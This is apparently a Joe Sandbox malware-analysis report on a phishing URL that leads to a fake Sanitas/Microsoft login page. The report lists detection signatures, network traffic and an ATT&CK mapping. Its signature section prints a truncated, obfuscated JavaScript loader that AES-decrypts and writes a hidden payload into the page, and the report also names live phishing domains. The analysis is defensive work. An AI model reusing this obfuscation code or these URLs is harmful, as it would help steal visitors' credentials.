Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==

Overview

General Information

Sample URL:	https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==
Analysis ID:	1522638

Detection

HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish70

HTML page contains suspicious javascript code

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML body with high number of embedded images detected

HTML page contains hidden javascript code

HTML title does not match URL

Stores files to the Windows start menu directory

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 5520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1972,i,14582413313291952037,17520994271373431238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.2.pages.csv	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	LLM: Score: 9 Reasons: The brand 'Sanitas' is known and associated with healthcare and wellness products., The URL 'bluntchiefei.za.com' does not match the legitimate domain 'sanitas.com'., The domain 'za.com' is unusual and not typically associated with the Sanitas brand., The presence of a password input field on a non-matching domain is suspicious., The URL contains an unrelated subdomain 'bluntchiefei', which is a common tactic in phishing attempts. DOM: 1.4.pages.csv
Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	LLM: Score: 9 Reasons: The brand 'Microsoft' is well-known and has a well-established domain 'microsoft.com'., The provided URL 'bluntchiefei.za.com' does not match the legitimate domain 'microsoft.com'., The URL contains an unusual domain extension '.za.com' which is not typically associated with Microsoft., The URL has no clear association with Microsoft, and the domain name 'bluntchiefei' is suspicious and unrelated to Microsoft., The email domain 'sanitas.es' does not provide any additional context to validate the URL. DOM: 1.3.pages.csv

Yara detected HtmlPhish70

Source: Yara match

File source: 1.2.pages.csv, type: HTML

HTML page contains suspicious javascript code

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==

HTTP Parser: window.location.href = atob(

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==

HTTP Parser: Number of links: 0

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==

HTTP Parser: Total embedded image size: 45687

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==

HTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==

HTTP Parser: Title: Continue to secure Log-in does not match URL

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==

HTTP Parser: async function eardrum(racial) { var {a,b,c,d}=json.parse(racial); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations:999}),{iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } (async () => { document.write(await eardrum(await (awaitfetch(awaiteardrum(atob(`eyjhijoisejmqlwvtdhxztzvdlrpoeprzu9utexubklid1rznvwvdenzmeljylwvze94st0ilcjjijoiyzc0zjg5zta0yme1zgy3zte3zgnjntbhztixztfmmjuilcjiijoimthhnjg4otuwodm2mja2mty0nwrhm2yyogm0zjuwy2u4oguxotm4n2fhogrjmmy2yjvmodi2nthjndhhotk3oddmotvlzmnhyjiwodg3mzk4ywq1yjy1njq1m2nimgm0zje1ywq2mdm5mwyxmzu5mzvlmmvlzjm0nzk3zjfimtgwyjg3yzzmzjk0zwm4ogi2ztvmmzfkymu2mdm2mzdlndjmmtmyngm3ymqxzjnjytezm2u3m2nhmwexm2zhnji0ody4nzy3y2jlote3n2uyntbhzmnjmdewzjbmzwqxmzbjntgxogu1mguymzy2mduwowiyngvjmdrlytjhmtdjodmwzdeynzrhywnhyzy2oti3zwu4nty1zje0mduxogm1odbkndy5odzmmjg5zdnhywnhnjiznwm5mdjhnzdlodjmyje0nme4mdaxmjq0ogu1mjjmyjk5mt...

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==

HTTP Parser: <input type="password" .../> found

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	HTTP Parser: No favicon
Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	HTTP Parser: No favicon
Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	HTTP Parser: No favicon
Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	HTTP Parser: No favicon

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	HTTP Parser: No <meta name="author".. found
Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	HTTP Parser: No <meta name="author".. found

Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	HTTP Parser: No <meta name="copyright".. found
Source: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:56474 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56472 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: global traffic	DNS traffic detected: DNS query: www.curiosolucky.com
Source: global traffic	DNS traffic detected: DNS query: bluntchiefei.za.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: synthsparkwe.ru
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com

Source: unknown	Network traffic detected: HTTP traffic on port 56492 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56477 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56483 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56489 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56497 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56500 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 56486 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56498 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56481 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56478 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56495 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56500
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56474
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56476
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 56484 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56496 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56477
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56478
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56479
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56484
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56485
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56486
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56487
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56480
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56481
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56482
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56483
Source: unknown	Network traffic detected: HTTP traffic on port 56487 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56493 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56476 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56488
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56489
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56495
Source: unknown	Network traffic detected: HTTP traffic on port 56482 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56496
Source: unknown	Network traffic detected: HTTP traffic on port 56479 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56497
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56498
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56491
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56492
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56493
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56494
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56490
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56494 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56485 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56474 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56491 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56480 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:56474 version: TLS 1.2

Source: classification engine

Classification label: mal60.phis.win@25/14@26/171

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1972,i,14582413313291952037,17520994271373431238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1972,i,14582413313291952037,17520994271373431238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	0%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
a.nel.cloudflare.com	0%	Virustotal		Browse
challenges.cloudflare.com	0%	Virustotal		Browse
www.curiosolucky.com	0%	Virustotal		Browse
curiosolucky.com	0%	Virustotal		Browse
www.google.com	0%	Virustotal		Browse
cdnjs.cloudflare.com	0%	Virustotal		Browse
code.jquery.com	1%	Virustotal		Browse

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
synthsparkwe.ru	172.67.131.14	true	false		unknown
bluntchiefei.za.com	188.114.96.3	true	true		unknown
a.nel.cloudflare.com	35.190.80.1	true	false	0%, Virustotal, Browse	unknown
code.jquery.com	151.101.194.137	true	false	1%, Virustotal, Browse	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false	0%, Virustotal, Browse	unknown
challenges.cloudflare.com	104.18.95.41	true	false	0%, Virustotal, Browse	unknown
www.google.com	142.250.186.164	true	false	0%, Virustotal, Browse	unknown
curiosolucky.com	149.56.200.84	true	false	0%, Virustotal, Browse	unknown
www.curiosolucky.com	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.131.14	synthsparkwe.ru	United States		13335	CLOUDFLARENETUS	false
104.17.24.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
142.250.186.67	unknown	United States		15169	GOOGLEUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
34.104.35.123	unknown	United States		15169	GOOGLEUS	false
104.18.95.41	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
149.56.200.84	curiosolucky.com	Canada		16276	OVHFR	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
188.114.96.3	bluntchiefei.za.com	European Union		13335	CLOUDFLARENETUS	true
142.250.186.164	www.google.com	United States		15169	GOOGLEUS	false
142.250.186.131	unknown	United States		15169	GOOGLEUS	false
142.250.186.142	unknown	United States		15169	GOOGLEUS	false
151.101.66.137	unknown	United States		54113	FASTLYUS	false
64.233.184.84	unknown	United States		15169	GOOGLEUS	false
142.250.186.110	unknown	United States		15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
151.101.194.137	code.jquery.com	United States		54113	FASTLYUS	false
104.17.25.14	unknown	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522638
Start date and time:	2024-09-30 14:02:42 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.win@25/14@26/171

Warnings

Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.186.142, 64.233.184.84, 34.104.35.123
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information

LLM Input / Output

Input	Output
